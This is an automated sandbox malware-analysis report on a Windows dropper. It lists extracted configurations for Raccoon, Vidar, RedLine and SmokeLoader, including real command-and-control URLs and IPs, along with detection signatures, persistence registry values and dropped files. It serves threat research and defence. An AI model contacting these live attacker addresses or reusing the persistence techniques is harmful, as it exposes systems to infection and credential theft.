Analysis
-
max time kernel
129s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
13-08-2021 19:33
Static task
static1
Behavioral task
behavioral1
Sample
6ADB8AA23FE92E5441F1156CC3FB949E.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
6ADB8AA23FE92E5441F1156CC3FB949E.exe
Resource
win10v20210410
General
-
Target
6ADB8AA23FE92E5441F1156CC3FB949E.exe
-
Size
631KB
-
MD5
6adb8aa23fe92e5441f1156cc3fb949e
-
SHA1
11abcec421eee539de1dea494c3159d3bf163881
-
SHA256
31452b50fe8475fa4566b814ed702c6910029ff66db45d3dbb21c2e3ed63594f
-
SHA512
316d7a3be61d4a227fdbb4351647467b65ea97df58403273c90ac6319229b2449fed1aec83eaa01eb1e75ac31d7682c3fa954cd1f1fa56c3b02a38de32b5f951
Malware Config
Extracted
http://193.56.146.55/Api/GetFile2
Extracted
raccoon
93d3ccba4a3cbd5e268873fc1760b2335272e198
-
url4cnc
https://telete.in/opa4kiprivatem
Extracted
vidar
40
916
https://lenak513.tumblr.com/
-
profile_id
916
Extracted
redline
installs2
65.21.228.92:46802
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
vidar
40
937
https://lenak513.tumblr.com/
-
profile_id
937
Extracted
redline
12_08_fatboy
zertypelil.xyz:80
Extracted
redline
ls2
salkefard.xyz:80
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4364-314-0x0000000001770000-0x0000000002096000-memory.dmp family_glupteba behavioral2/memory/4364-328-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5088 5984 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 5984 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6044 5984 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4640 5984 schtasks.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe family_redline C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe family_redline C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe family_redline C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe family_redline behavioral2/memory/4336-254-0x0000000000ED0000-0x0000000000EE9000-memory.dmp family_redline behavioral2/memory/4232-302-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral2/memory/4232-307-0x0000000000418F86-mapping.dmp family_redline behavioral2/memory/4240-301-0x0000000000418F6A-mapping.dmp family_redline behavioral2/memory/4240-296-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 2172 created 4252 2172 WerFault.exe hozif_R0m00yWfOVjtp_PDHQ.exe PID 4468 created 4284 4468 WerFault.exe eGJclJQJWVBOFygCVzpPNsAl.exe PID 5404 created 4324 5404 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe PID 5532 created 4268 5532 WerFault.exe AfGceh7C3AiICU0VpXEapNYr.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 4064 created 4364 4064 svchost.exe PXBzV_zEw_pgOR1zKtBuDE1n.exe -
suricata: ET MALWARE GCleaner Downloader Activity M1
suricata: ET MALWARE GCleaner Downloader Activity M1
-
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
-
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
-
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4324-222-0x0000000000400000-0x0000000002D16000-memory.dmp family_vidar behavioral2/memory/4324-221-0x0000000004910000-0x00000000049AD000-memory.dmp family_vidar behavioral2/memory/4164-276-0x0000000000400000-0x0000000002D16000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 63 IoCs
Processes:
Pb17tPXfuEqViJcCjKmT7yDb.exeb0Jm51vLbWPyCkE6vTfUOh8q.exexlzHeuwelgGNWi4FQtKYtaLs.exeUxSWhTy41TFRKucJet4YNiEK.exehpG_QsrS8jyUhxZBwiU7DK_t.exeAfGceh7C3AiICU0VpXEapNYr.exeRbEqteJ5drtD1PHvqibD7reP.exeSoICTNRTJ2YvPMH8qYwUTKKW.exeY6eV1ERSHcBk8XWyMyACCKSW.exevwBuTIRxRb5SNSqZ3XF8NBD2.tmpneVBHdSUrlSjAeQjSg3KZDBw.exehozif_R0m00yWfOVjtp_PDHQ.exeuLClj5kj3AoL6JIVVR4sepVv.exePXBzV_zEw_pgOR1zKtBuDE1n.exeX6wMz1CRIeJyms6WRZPsFM_R.exeXnOoxUckggjX5foWJMU2gw8A.exex5iNqYgETCMGFiSGZnpQGxcq.exeehAkZbkYLsgDGk486mcpJWLA.exeeGJclJQJWVBOFygCVzpPNsAl.execBtqBNqwXdb3zhTMvm1NJw2V.exeYLyfLdtG4aeto7JDq0eATD13.exeUP4ViI_hwH9jVOJQS4l4acdd.exexlzHeuwelgGNWi4FQtKYtaLs.exevwBuTIRxRb5SNSqZ3XF8NBD2.execustomer3.exemd8_8eus.exejooyu.exeneVBHdSUrlSjAeQjSg3KZDBw.exeRbEqteJ5drtD1PHvqibD7reP.exe4963167.exe2066937.exe11111.exe8732185.exe3549794.exe3270862.exe2101679.exe4274478.exe4806551.exejfiag3g_gg.exe11111.exe11111.exe11111.exeWinHoster.exe11111.exe11111.exe11111.exeehAkZbkYLsgDGk486mcpJWLA.exejfiag3g_gg.exe22222.exebackgroundTaskHost.exe22222.exe22222.exeSoICTNRTJ2YvPMH8qYwUTKKW.exePXBzV_zEw_pgOR1zKtBuDE1n.exePb17tPXfuEqViJcCjKmT7yDb.exeF1A5.exeConhost.exeF476.exeRuntimebroker.exeF794.exeFA92.exereviewbrokercrtCommonsessionperfDll.exepid process 4180 Pb17tPXfuEqViJcCjKmT7yDb.exe 4164 b0Jm51vLbWPyCkE6vTfUOh8q.exe 4144 xlzHeuwelgGNWi4FQtKYtaLs.exe 4156 UxSWhTy41TFRKucJet4YNiEK.exe 4192 hpG_QsrS8jyUhxZBwiU7DK_t.exe 4268 AfGceh7C3AiICU0VpXEapNYr.exe 4260 RbEqteJ5drtD1PHvqibD7reP.exe 4316 SoICTNRTJ2YvPMH8qYwUTKKW.exe 4324 Y6eV1ERSHcBk8XWyMyACCKSW.exe 4300 vwBuTIRxRb5SNSqZ3XF8NBD2.tmp 4292 neVBHdSUrlSjAeQjSg3KZDBw.exe 4252 hozif_R0m00yWfOVjtp_PDHQ.exe 4344 uLClj5kj3AoL6JIVVR4sepVv.exe 4364 PXBzV_zEw_pgOR1zKtBuDE1n.exe 4380 X6wMz1CRIeJyms6WRZPsFM_R.exe 4336 XnOoxUckggjX5foWJMU2gw8A.exe 4372 x5iNqYgETCMGFiSGZnpQGxcq.exe 4308 ehAkZbkYLsgDGk486mcpJWLA.exe 4284 eGJclJQJWVBOFygCVzpPNsAl.exe 4420 cBtqBNqwXdb3zhTMvm1NJw2V.exe 4520 YLyfLdtG4aeto7JDq0eATD13.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 5112 xlzHeuwelgGNWi4FQtKYtaLs.exe 1792 vwBuTIRxRb5SNSqZ3XF8NBD2.exe 2120 customer3.exe 2736 md8_8eus.exe 3588 jooyu.exe 4300 vwBuTIRxRb5SNSqZ3XF8NBD2.tmp 4240 neVBHdSUrlSjAeQjSg3KZDBw.exe 4232 RbEqteJ5drtD1PHvqibD7reP.exe 1460 4963167.exe 4696 2066937.exe 4848 11111.exe 4636 8732185.exe 4844 3549794.exe 4356 3270862.exe 5172 2101679.exe 5304 4274478.exe 5380 4806551.exe 3988 jfiag3g_gg.exe 4416 11111.exe 4720 11111.exe 5108 11111.exe 4688 WinHoster.exe 740 11111.exe 5464 11111.exe 5880 11111.exe 4948 ehAkZbkYLsgDGk486mcpJWLA.exe 3976 jfiag3g_gg.exe 5876 22222.exe 2284 backgroundTaskHost.exe 5156 22222.exe 4628 22222.exe 5888 SoICTNRTJ2YvPMH8qYwUTKKW.exe 4248 PXBzV_zEw_pgOR1zKtBuDE1n.exe 4476 Pb17tPXfuEqViJcCjKmT7yDb.exe 5696 F1A5.exe 4560 Conhost.exe 4728 F476.exe 6000 Runtimebroker.exe 4540 F794.exe 5632 FA92.exe 5140 reviewbrokercrtCommonsessionperfDll.exe -
Processes:
resource yara_rule C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vmprotect behavioral2/memory/2736-255-0x0000000000400000-0x000000000067D000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
X6wMz1CRIeJyms6WRZPsFM_R.exeuLClj5kj3AoL6JIVVR4sepVv.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion X6wMz1CRIeJyms6WRZPsFM_R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion X6wMz1CRIeJyms6WRZPsFM_R.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uLClj5kj3AoL6JIVVR4sepVv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uLClj5kj3AoL6JIVVR4sepVv.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
6ADB8AA23FE92E5441F1156CC3FB949E.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation 6ADB8AA23FE92E5441F1156CC3FB949E.exe -
Drops startup file 2 IoCs
Processes:
customer3.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe customer3.exe -
Loads dropped DLL 16 IoCs
Processes:
UP4ViI_hwH9jVOJQS4l4acdd.exevwBuTIRxRb5SNSqZ3XF8NBD2.tmpY6eV1ERSHcBk8XWyMyACCKSW.exeb0Jm51vLbWPyCkE6vTfUOh8q.exepid process 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4300 vwBuTIRxRb5SNSqZ3XF8NBD2.tmp 4300 vwBuTIRxRb5SNSqZ3XF8NBD2.tmp 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4324 Y6eV1ERSHcBk8XWyMyACCKSW.exe 4324 Y6eV1ERSHcBk8XWyMyACCKSW.exe 4164 b0Jm51vLbWPyCkE6vTfUOh8q.exe 4164 b0Jm51vLbWPyCkE6vTfUOh8q.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe 4580 UP4ViI_hwH9jVOJQS4l4acdd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe themida C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe themida C:\Users\Admin\Documents\X6wMz1CRIeJyms6WRZPsFM_R.exe themida C:\Users\Admin\Documents\uLClj5kj3AoL6JIVVR4sepVv.exe themida behavioral2/memory/4380-249-0x0000000000960000-0x0000000000961000-memory.dmp themida behavioral2/memory/4344-259-0x0000000000AA0000-0x0000000000AA1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
3549794.exereviewbrokercrtCommonsessionperfDll.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 3549794.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bitsadmin = "\"C:\\Documents and Settings\\bitsadmin.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AfGceh7C3AiICU0VpXEapNYr = "\"C:\\Users\\Admin\\Documents\\cBtqBNqwXdb3zhTMvm1NJw2V\\AfGceh7C3AiICU0VpXEapNYr.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\spoolsv\\dllhost.exe\"" reviewbrokercrtCommonsessionperfDll.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\System32\\C_20905\\dwm.exe\"" reviewbrokercrtCommonsessionperfDll.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
uLClj5kj3AoL6JIVVR4sepVv.exemd8_8eus.exeX6wMz1CRIeJyms6WRZPsFM_R.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uLClj5kj3AoL6JIVVR4sepVv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA X6wMz1CRIeJyms6WRZPsFM_R.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ipinfo.io 117 ipinfo.io 119 ipinfo.io 120 ip-api.com 22 ipinfo.io -
Drops file in System32 directory 4 IoCs
Processes:
reviewbrokercrtCommonsessionperfDll.exedescription ioc process File created C:\Windows\System32\C_20905\6cb0b6c459d5d3455a3da700e713f2e2529862ff reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\spoolsv\dllhost.exe reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\spoolsv\5940a34987c99120d96dace90a3f93f329dcad63 reviewbrokercrtCommonsessionperfDll.exe File created C:\Windows\System32\C_20905\dwm.exe reviewbrokercrtCommonsessionperfDll.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
X6wMz1CRIeJyms6WRZPsFM_R.exeuLClj5kj3AoL6JIVVR4sepVv.exepid process 4380 X6wMz1CRIeJyms6WRZPsFM_R.exe 4344 uLClj5kj3AoL6JIVVR4sepVv.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
xlzHeuwelgGNWi4FQtKYtaLs.exepowershell.exeRbEqteJ5drtD1PHvqibD7reP.exeehAkZbkYLsgDGk486mcpJWLA.exeSoICTNRTJ2YvPMH8qYwUTKKW.exedescription pid process target process PID 4144 set thread context of 5112 4144 xlzHeuwelgGNWi4FQtKYtaLs.exe xlzHeuwelgGNWi4FQtKYtaLs.exe PID 4292 set thread context of 4240 4292 powershell.exe neVBHdSUrlSjAeQjSg3KZDBw.exe PID 4260 set thread context of 4232 4260 RbEqteJ5drtD1PHvqibD7reP.exe RbEqteJ5drtD1PHvqibD7reP.exe PID 4308 set thread context of 4948 4308 ehAkZbkYLsgDGk486mcpJWLA.exe ehAkZbkYLsgDGk486mcpJWLA.exe PID 4316 set thread context of 5888 4316 SoICTNRTJ2YvPMH8qYwUTKKW.exe SoICTNRTJ2YvPMH8qYwUTKKW.exe -
Drops file in Program Files directory 64 IoCs
Processes:
UP4ViI_hwH9jVOJQS4l4acdd.exemd8_8eus.exehpG_QsrS8jyUhxZBwiU7DK_t.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\batch_window.html UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\dummy.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb md8_8eus.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.json UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe hpG_QsrS8jyUhxZBwiU7DK_t.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini hpG_QsrS8jyUhxZBwiU7DK_t.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\Company\NewProduct\d md8_8eus.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\soundcloud.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe hpG_QsrS8jyUhxZBwiU7DK_t.exe File created C:\Program Files (x86)\lighteningplayer\regstr UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll UP4ViI_hwH9jVOJQS4l4acdd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 34 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2332 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 808 4252 WerFault.exe hozif_R0m00yWfOVjtp_PDHQ.exe 772 4284 WerFault.exe eGJclJQJWVBOFygCVzpPNsAl.exe 1052 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 4120 4284 WerFault.exe eGJclJQJWVBOFygCVzpPNsAl.exe 4708 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 4484 4252 WerFault.exe hozif_R0m00yWfOVjtp_PDHQ.exe 2196 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 4768 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 4532 4284 WerFault.exe eGJclJQJWVBOFygCVzpPNsAl.exe 5480 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 5536 4284 WerFault.exe eGJclJQJWVBOFygCVzpPNsAl.exe 5552 4252 WerFault.exe hozif_R0m00yWfOVjtp_PDHQ.exe 5520 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 1496 4252 WerFault.exe hozif_R0m00yWfOVjtp_PDHQ.exe 4568 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 4532 4372 WerFault.exe x5iNqYgETCMGFiSGZnpQGxcq.exe 5672 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 5744 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 2172 4252 WerFault.exe hozif_R0m00yWfOVjtp_PDHQ.exe 4760 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 2204 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 6016 4284 WerFault.exe eGJclJQJWVBOFygCVzpPNsAl.exe 4468 4284 WerFault.exe eGJclJQJWVBOFygCVzpPNsAl.exe 5560 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 1260 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 5920 4324 WerFault.exe Y6eV1ERSHcBk8XWyMyACCKSW.exe 5748 4164 WerFault.exe b0Jm51vLbWPyCkE6vTfUOh8q.exe 